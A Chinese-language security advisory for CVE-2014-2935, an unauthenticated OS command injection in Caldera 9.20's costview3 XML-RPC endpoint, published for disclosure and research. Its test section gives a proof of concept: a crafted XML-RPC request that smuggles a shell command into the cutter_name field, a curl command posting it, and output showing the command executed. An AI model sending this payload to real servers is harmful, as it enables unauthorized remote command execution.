发布日期：2014-05-07

更新日期：2014-05-10

受影响系统：

Caldera Caldera 9.20

描述：

--------------------------------------------------------------------------------

BUGTRAQ  ID: 67252

CVE(CAN) ID: CVE-2014-2935

Caldera是RIP软件、色彩管理软件、工作流软件。

Caldera 9.20及更早版本没有正确删除OS命令内使用的某些元素， '/costview3/xmlrpc_server/xmlrpc.php' 脚本存在命令执行漏洞，未经身份验证的远程用户提交特制的PHP XMLRPC请求即可触发此漏洞，导致执行OS命令。

Markus Wulftange

链接：http://www.kb.cert.org/vuls/id/693092

*>

测试方法：

--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Example:

$ cat get_cutter_tools.xml

xmlrpc.get_cutter_tools_xmlrpc

cutter_name

; echo

"<CalderaInfo><methods><item><type>`id`</type></item></methods></CalderaInfo

>"

$ curl --data @get_cutter_tools.xml http:///costview3/xmlrpc_server/xmlrpc.php

get_cutter_tools_xmlrpc

uid=1002(caldera) gid=1001(caldera)

groups=1001(caldera),4(adm),7(lp),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),46(plugdev),103

(fuse),104(scanner),109(netdev)

建议：

--------------------------------------------------------------------------------

厂商补丁：

Caldera

-------

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.caldera.com/support/

http://www.caldera.com/product/version-9-20/

http://www.caldera.com/product/options/costview/